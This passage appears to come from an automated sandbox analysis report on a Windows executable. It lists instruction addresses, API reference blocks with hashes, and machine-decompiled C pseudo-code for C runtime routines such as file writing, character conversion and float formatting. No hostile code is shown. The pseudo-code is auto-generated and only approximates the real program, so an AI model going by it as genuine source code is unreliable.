                                                                      0x00405e2e
                                                                      0x00405e32
                                                                      0x00405e34
                                                                      0x00405e37
                                                                      0x00405e38
                                                                      0x00405e3c
                                                                      0x00405e43
                                                                      0x00405e45
                                                                      0x00405e45
                                                                      0x00405e43
                                                                      0x00405e4c
                                                                      0x00405e4e
                                                                      0x00000000
                                                                      0x00405e50
                                                                      0x00405e50
                                                                      0x00405e50
                                                                      0x00405e55
                                                                      0x00405e57
                                                                      0x00405e59
                                                                      0x00405e59
                                                                      0x00405e61
                                                                      0x00405e66
                                                                      0x00405e69
                                                                      0x00405e6b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405e6d
                                                                      0x00405e6f
                                                                      0x00405e71
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405e71
                                                                      0x00000000
                                                                      0x00405e50
                                                                      0x00405e1a
                                                                      0x00405e1f
                                                                      0x00405e24
                                                                      0x00405e27
                                                                      0x00405e2a
                                                                      0x00405e2c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405e2c
                                                                      0x00405e18
                                                                      0x00405e12
                                                                      0x00405dc3
                                                                      0x00405dc9
                                                                      0x00405dcb
                                                                      0x00405dcc
                                                                      0x00405dcd
                                                                      0x00405dd4
                                                                      0x00405ddb
                                                                      0x00405ddd
                                                                      0x00405de5
                                                                      0x00405de7
                                                                      0x00000000
                                                                      0x00405ded
                                                                      0x00405ded
                                                                      0x00405df0
                                                                      0x00405df7
                                                                      0x00405df7
                                                                      0x00405de7
                                                                      0x00405dc1
                                                                      0x00405d3a
                                                                      0x00405d3c
                                                                      0x00405d3e
                                                                      0x00405d3e
                                                                      0x00405d43
                                                                      0x00405e79
                                                                      0x00405e7a
                                                                      0x00405e7a
                                                                      0x00405e7e
                                                                      0x00405d49
                                                                      0x00405d4d
                                                                      0x00405d77
                                                                      0x00405d79
                                                                      0x00405da7
                                                                      0x00405dac
                                                                      0x00405d7b
                                                                      0x00405d80
                                                                      0x00405d80
                                                                      0x00405d87
                                                                      0x00405d89
                                                                      0x00405d89
                                                                      0x00405d91
                                                                      0x00405d96
                                                                      0x00405d9b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405da1
                                                                      0x00405da5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405da5
                                                                      0x00000000
                                                                      0x00405d80
                                                                      0x00405d4f
                                                                      0x00405d54
                                                                      0x00405d59
                                                                      0x00405d5c
                                                                      0x00405d61
                                                                      0x00000000
                                                                      0x00405d67
                                                                      0x00405d6f
                                                                      0x00405d74
                                                                      0x00000000
                                                                      0x00405d74
                                                                      0x00405d61
                                                                      0x00405d4d
                                                                      0x00405d43
                                                                      0x00405d38
                                                                      0x00405d20
                                                                      0x00405d14
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _fseek_malloc_memset
                                                                      • String ID:
                                                                      • API String ID: 208892515-0
                                                                      • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                      • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t59;
                                                                      				intOrPtr* _t61;
                                                                      				signed int _t63;
                                                                      				void* _t68;
                                                                      				signed int _t69;
                                                                      				signed int _t72;
                                                                      				signed int _t74;
                                                                      				signed int _t75;
                                                                      				signed int _t77;
                                                                      				signed int _t78;
                                                                      				signed int _t81;
                                                                      				signed int _t82;
                                                                      				signed int _t84;
                                                                      				signed int _t88;
                                                                      				signed int _t97;
                                                                      				signed int _t98;
                                                                      				signed int _t99;
                                                                      				intOrPtr* _t100;
                                                                      				void* _t101;
                                                                      
                                                                      				_t90 = __edx;
                                                                      				if(_a8 == 0 || _a12 == 0) {
                                                                      					L4:
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t100 = _a16;
                                                                      					_t105 = _t100;
                                                                      					if(_t100 != 0) {
                                                                      						_t82 = _a4;
                                                                      						__eflags = _t82;
                                                                      						if(__eflags == 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t63 = _t59 | 0xffffffff;
                                                                      						_t90 = _t63 % _a8;
                                                                      						__eflags = _a12 - _t63 / _a8;
                                                                      						if(__eflags > 0) {
                                                                      							goto L3;
                                                                      						}
                                                                      						_t97 = _a8 * _a12;
                                                                      						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                      						_v8 = _t82;
                                                                      						_v16 = _t97;
                                                                      						_t81 = _t97;
                                                                      						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                      							_v12 = 0x1000;
                                                                      						} else {
                                                                      							_v12 =  *(_t100 + 0x18);
                                                                      						}
                                                                      						__eflags = _t97;
                                                                      						if(_t97 == 0) {
                                                                      							L32:
                                                                      							return _a12;
                                                                      						} else {
                                                                      							do {
                                                                      								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                      								__eflags = _t84;
                                                                      								if(_t84 == 0) {
                                                                      									L18:
                                                                      									__eflags = _t81 - _v12;
                                                                      									if(_t81 < _v12) {
                                                                      										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                      										__eflags = _t68 - 0xffffffff;
                                                                      										if(_t68 == 0xffffffff) {
                                                                      											L34:
                                                                      											_t69 = _t97;
                                                                      											L35:
                                                                      											return (_t69 - _t81) / _a8;
                                                                      										}
                                                                      										_v8 = _v8 + 1;
                                                                      										_t72 =  *(_t100 + 0x18);
                                                                      										_t81 = _t81 - 1;
                                                                      										_v12 = _t72;
                                                                      										__eflags = _t72;
                                                                      										if(_t72 <= 0) {
                                                                      											_v12 = 1;
                                                                      										}
                                                                      										goto L31;
                                                                      									}
                                                                      									__eflags = _t84;
                                                                      									if(_t84 == 0) {
                                                                      										L21:
                                                                      										__eflags = _v12;
                                                                      										_t98 = _t81;
                                                                      										if(_v12 != 0) {
                                                                      											_t75 = _t81;
                                                                      											_t90 = _t75 % _v12;
                                                                      											_t98 = _t98 - _t75 % _v12;
                                                                      											__eflags = _t98;
                                                                      										}
                                                                      										_push(_t98);
                                                                      										_push(_v8);
                                                                      										_push(E0040FA20(_t90, _t98, _t100));
                                                                      										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                      										_t101 = _t101 + 0xc;
                                                                      										__eflags = _t74 - 0xffffffff;
                                                                      										if(_t74 == 0xffffffff) {
                                                                      											L36:
                                                                      											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                      											_t69 = _v16;
                                                                      											goto L35;
                                                                      										} else {
                                                                      											_t88 = _t98;
                                                                      											__eflags = _t74 - _t98;
                                                                      											if(_t74 <= _t98) {
                                                                      												_t88 = _t74;
                                                                      											}
                                                                      											_v8 = _v8 + _t88;
                                                                      											_t81 = _t81 - _t88;
                                                                      											__eflags = _t74 - _t98;
                                                                      											if(_t74 < _t98) {
                                                                      												goto L36;
                                                                      											} else {
                                                                      												L27:
                                                                      												_t97 = _v16;
                                                                      												goto L31;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									_t77 = E0040C1FB(_t100);
                                                                      									__eflags = _t77;
                                                                      									if(_t77 != 0) {
                                                                      										goto L34;
                                                                      									}
                                                                      									goto L21;
                                                                      								}
                                                                      								_t78 =  *(_t100 + 4);
                                                                      								__eflags = _t78;
                                                                      								if(__eflags == 0) {
                                                                      									goto L18;
                                                                      								}
                                                                      								if(__eflags < 0) {
                                                                      									_t48 = _t100 + 0xc;
                                                                      									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                      									__eflags =  *_t48;
                                                                      									goto L34;
                                                                      								}
                                                                      								_t99 = _t81;
                                                                      								__eflags = _t81 - _t78;
                                                                      								if(_t81 >= _t78) {
                                                                      									_t99 = _t78;
                                                                      								}
                                                                      								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                      								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                      								 *_t100 =  *_t100 + _t99;
                                                                      								_t101 = _t101 + 0xc;
                                                                      								_t81 = _t81 - _t99;
                                                                      								_v8 = _v8 + _t99;
                                                                      								goto L27;
                                                                      								L31:
                                                                      								__eflags = _t81;
                                                                      							} while (_t81 != 0);
                                                                      							goto L32;
                                                                      						}
                                                                      					}
                                                                      					L3:
                                                                      					_t61 = E0040BFC1(_t105);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					 *_t61 = 0x16;
                                                                      					E0040E744(_t90, 0, _t100);
                                                                      					goto L4;
                                                                      				}
                                                                      			}





























                                                                      0x0040baaa
                                                                      0x0040baba
                                                                      0x0040bae0
                                                                      0x00000000
                                                                      0x0040bac1
                                                                      0x0040bac1
                                                                      0x0040bac4
                                                                      0x0040bac6
                                                                      0x0040bae7
                                                                      0x0040baea
                                                                      0x0040baec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040baee
                                                                      0x0040baf3
                                                                      0x0040baf6
                                                                      0x0040baf9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040bafe
                                                                      0x0040bb02
                                                                      0x0040bb09
                                                                      0x0040bb0c
                                                                      0x0040bb0f
                                                                      0x0040bb11
                                                                      0x0040bb1b
                                                                      0x0040bb13
                                                                      0x0040bb16
                                                                      0x0040bb16
                                                                      0x0040bb22
                                                                      0x0040bb24
                                                                      0x0040bbe9
                                                                      0x00000000
                                                                      0x0040bb2a
                                                                      0x0040bb2a
                                                                      0x0040bb2d
                                                                      0x0040bb2d
                                                                      0x0040bb33
                                                                      0x0040bb64
                                                                      0x0040bb64
                                                                      0x0040bb67
                                                                      0x0040bbc0
                                                                      0x0040bbc7
                                                                      0x0040bbca
                                                                      0x0040bbf5
                                                                      0x0040bbf5
                                                                      0x0040bbf7
                                                                      0x00000000
                                                                      0x0040bbfb
                                                                      0x0040bbcc
                                                                      0x0040bbcf
                                                                      0x0040bbd2
                                                                      0x0040bbd3
                                                                      0x0040bbd6
                                                                      0x0040bbd8
                                                                      0x0040bbda
                                                                      0x0040bbda
                                                                      0x00000000
                                                                      0x0040bbd8
                                                                      0x0040bb69
                                                                      0x0040bb6b
                                                                      0x0040bb78
                                                                      0x0040bb78
                                                                      0x0040bb7c
                                                                      0x0040bb7e
                                                                      0x0040bb82
                                                                      0x0040bb84
                                                                      0x0040bb87
                                                                      0x0040bb87
                                                                      0x0040bb87
                                                                      0x0040bb89
                                                                      0x0040bb8a
                                                                      0x0040bb94
                                                                      0x0040bb95
                                                                      0x0040bb9a
                                                                      0x0040bb9d
                                                                      0x0040bba0
                                                                      0x0040bc03
                                                                      0x0040bc03
                                                                      0x0040bc07
                                                                      0x00000000
                                                                      0x0040bba2
                                                                      0x0040bba2
                                                                      0x0040bba4
                                                                      0x0040bba6
                                                                      0x0040bba8
                                                                      0x0040bba8
                                                                      0x0040bbaa
                                                                      0x0040bbad
                                                                      0x0040bbaf
                                                                      0x0040bbb1
                                                                      0x00000000
                                                                      0x0040bbb3
                                                                      0x0040bbb3
                                                                      0x0040bbb3
                                                                      0x00000000
                                                                      0x0040bbb3
                                                                      0x0040bbb1
                                                                      0x0040bba0
                                                                      0x0040bb6e
                                                                      0x0040bb74
                                                                      0x0040bb76
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040bb76
                                                                      0x0040bb35
                                                                      0x0040bb38
                                                                      0x0040bb3a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040bb3c
                                                                      0x0040bbf1
                                                                      0x0040bbf1
                                                                      0x0040bbf1
                                                                      0x00000000
                                                                      0x0040bbf1
                                                                      0x0040bb42
                                                                      0x0040bb44
                                                                      0x0040bb46
                                                                      0x0040bb48
                                                                      0x0040bb48
                                                                      0x0040bb50
                                                                      0x0040bb55
                                                                      0x0040bb58
                                                                      0x0040bb5a
                                                                      0x0040bb5d
                                                                      0x0040bb5f
                                                                      0x00000000
                                                                      0x0040bbe1
                                                                      0x0040bbe1
                                                                      0x0040bbe1
                                                                      0x00000000
                                                                      0x0040bb2a
                                                                      0x0040bb24
                                                                      0x0040bac8
                                                                      0x0040bac8
                                                                      0x0040bacd
                                                                      0x0040bace
                                                                      0x0040bacf
                                                                      0x0040bad0
                                                                      0x0040bad1
                                                                      0x0040bad2
                                                                      0x0040bad8
                                                                      0x00000000
                                                                      0x0040badd

                                                                      APIs
                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                      • String ID:
                                                                      • API String ID: 3240763771-0
                                                                      • Opcode ID: 5ae6f52eb953361433d7ea32021fe6e8a7002ad97f6d3a8caf392525720eb222
                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                      • Opcode Fuzzy Hash: 5ae6f52eb953361433d7ea32021fe6e8a7002ad97f6d3a8caf392525720eb222
                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005C553A
                                                                      • __isleadbyte_l.LIBCMT ref: 005C556E
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 005C559F
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 005C560D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                      • Instruction ID: cf1f3e8774af0f3fc381f8198ea3ff65c0a89f1032b816ae49911e186a64cc51
                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                      • Instruction Fuzzy Hash: FC317C31A10686AFDB20DFE4D884EBE7FA6BF01310B18856DE5658B1A1F730E980DB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                      				char _v8;
                                                                      				signed int _v12;
                                                                      				char _v20;
                                                                      				char _t43;
                                                                      				char _t46;
                                                                      				signed int _t53;
                                                                      				signed int _t54;
                                                                      				intOrPtr _t56;
                                                                      				int _t57;
                                                                      				int _t58;
                                                                      				signed short* _t59;
                                                                      				short* _t60;
                                                                      				int _t65;
                                                                      				char* _t72;
                                                                      
                                                                      				_t72 = _a8;
                                                                      				if(_t72 == 0 || _a12 == 0) {
                                                                      					L5:
                                                                      					return 0;
                                                                      				} else {
                                                                      					if( *_t72 != 0) {
                                                                      						E0040EC86( &_v20, _a16);
                                                                      						_t43 = _v20;
                                                                      						__eflags =  *(_t43 + 0x14);
                                                                      						if( *(_t43 + 0x14) != 0) {
                                                                      							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                      							__eflags = _t46;
                                                                      							if(_t46 == 0) {
                                                                      								__eflags = _a4;
                                                                      								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                      								if(__eflags != 0) {
                                                                      									L10:
                                                                      									__eflags = _v8;
                                                                      									if(_v8 != 0) {
                                                                      										_t53 = _v12;
                                                                      										_t11 = _t53 + 0x70;
                                                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                      										__eflags =  *_t11;
                                                                      									}
                                                                      									return 1;
                                                                      								}
                                                                      								L21:
                                                                      								_t54 = E0040BFC1(__eflags);
                                                                      								 *_t54 = 0x2a;
                                                                      								__eflags = _v8;
                                                                      								if(_v8 != 0) {
                                                                      									_t54 = _v12;
                                                                      									_t33 = _t54 + 0x70;
                                                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                      									__eflags =  *_t33;
                                                                      								}
                                                                      								return _t54 | 0xffffffff;
                                                                      							}
                                                                      							_t56 = _v20;
                                                                      							_t65 =  *(_t56 + 0xac);
                                                                      							__eflags = _t65 - 1;
                                                                      							if(_t65 <= 1) {
                                                                      								L17:
                                                                      								__eflags = _a12 -  *(_t56 + 0xac);
                                                                      								if(__eflags < 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								__eflags = _t72[1];
                                                                      								if(__eflags == 0) {
                                                                      									goto L21;
                                                                      								}
                                                                      								L19:
                                                                      								_t57 =  *(_t56 + 0xac);
                                                                      								__eflags = _v8;
                                                                      								if(_v8 == 0) {
                                                                      									return _t57;
                                                                      								}
                                                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                      								return _t57;
                                                                      							}
                                                                      							__eflags = _a12 - _t65;
                                                                      							if(_a12 < _t65) {
                                                                      								goto L17;
                                                                      							}
                                                                      							__eflags = _a4;
                                                                      							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                      							__eflags = _t58;
                                                                      							_t56 = _v20;
                                                                      							if(_t58 != 0) {
                                                                      								goto L19;
                                                                      							}
                                                                      							goto L17;
                                                                      						}
                                                                      						_t59 = _a4;
                                                                      						__eflags = _t59;
                                                                      						if(_t59 != 0) {
                                                                      							 *_t59 =  *_t72 & 0x000000ff;
                                                                      						}
                                                                      						goto L10;
                                                                      					} else {
                                                                      						_t60 = _a4;
                                                                      						if(_t60 != 0) {
                                                                      							 *_t60 = 0;
                                                                      						}
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      			}

















                                                                      0x004152a9
                                                                      0x004152b0
                                                                      0x004152c7
                                                                      0x00000000
                                                                      0x004152b7
                                                                      0x004152b9
                                                                      0x004152d3
                                                                      0x004152d8
                                                                      0x004152db
                                                                      0x004152de
                                                                      0x00415307
                                                                      0x0041530e
                                                                      0x00415310
                                                                      0x00415391
                                                                      0x004153ac
                                                                      0x004153ae
                                                                      0x004152ee
                                                                      0x004152ee
                                                                      0x004152f1
                                                                      0x004152f3
                                                                      0x004152f6
                                                                      0x004152f6
                                                                      0x004152f6
                                                                      0x004152f6
                                                                      0x00000000
                                                                      0x004152fc
                                                                      0x00415370
                                                                      0x00415370
                                                                      0x00415375
                                                                      0x0041537b
                                                                      0x0041537e
                                                                      0x00415380
                                                                      0x00415383
                                                                      0x00415383
                                                                      0x00415383
                                                                      0x00415383
                                                                      0x00000000
                                                                      0x00415387
                                                                      0x00415312
                                                                      0x00415315
                                                                      0x0041531b
                                                                      0x0041531e
                                                                      0x00415345
                                                                      0x00415348
                                                                      0x0041534e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415350
                                                                      0x00415353
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415355
                                                                      0x00415355
                                                                      0x0041535b
                                                                      0x0041535e
                                                                      0x004152cc
                                                                      0x004152cc
                                                                      0x00415367
                                                                      0x00000000
                                                                      0x00415367
                                                                      0x00415320
                                                                      0x00415323
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415327
                                                                      0x00415338
                                                                      0x0041533e
                                                                      0x00415340
                                                                      0x00415343
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00415343
                                                                      0x004152e0
                                                                      0x004152e3
                                                                      0x004152e5
                                                                      0x004152eb
                                                                      0x004152eb
                                                                      0x00000000
                                                                      0x004152bb
                                                                      0x004152bb
                                                                      0x004152c0
                                                                      0x004152c4
                                                                      0x004152c4
                                                                      0x00000000
                                                                      0x004152c0
                                                                      0x004152b9

                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                      • Instruction ID: ac1f15453c655125f3d335d89e3834493cfb741c27c87bd46a31552bbcfef14d
                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                      • Instruction Fuzzy Hash: C7114BB200014EBFCF125EC5DC49DEE3FA2FB58354B588519FA2859131E637CAB1AB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				intOrPtr _t25;
                                                                      				void* _t26;
                                                                      				void* _t28;
                                                                      
                                                                      				_t25 = _a16;
                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                      					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      					goto L9;
                                                                      				} else {
                                                                      					_t34 = _t25 - 0x66;
                                                                      					if(_t25 != 0x66) {
                                                                      						__eflags = _t25 - 0x61;
                                                                      						if(_t25 == 0x61) {
                                                                      							L7:
                                                                      							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      						} else {
                                                                      							__eflags = _t25 - 0x41;
                                                                      							if(__eflags == 0) {
                                                                      								goto L7;
                                                                      							} else {
                                                                      								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                      							}
                                                                      						}
                                                                      						L9:
                                                                      						return _t26;
                                                                      					} else {
                                                                      						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                      					}
                                                                      				}
                                                                      			}






                                                                      0x004134e0
                                                                      0x004134e6
                                                                      0x00413559
                                                                      0x00000000
                                                                      0x004134ed
                                                                      0x004134ed
                                                                      0x004134f0
                                                                      0x0041350b
                                                                      0x0041350e
                                                                      0x0041352e
                                                                      0x00413540
                                                                      0x00413510
                                                                      0x00413510
                                                                      0x00413513
                                                                      0x00000000
                                                                      0x00413515
                                                                      0x00413527
                                                                      0x00413527
                                                                      0x00413513
                                                                      0x0041355e
                                                                      0x00413562
                                                                      0x004134f2
                                                                      0x0041350a
                                                                      0x0041350a
                                                                      0x004134f0

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:54.2%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:31
                                                                      Total number of Limit Nodes:2

                                                                      Callgraph

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
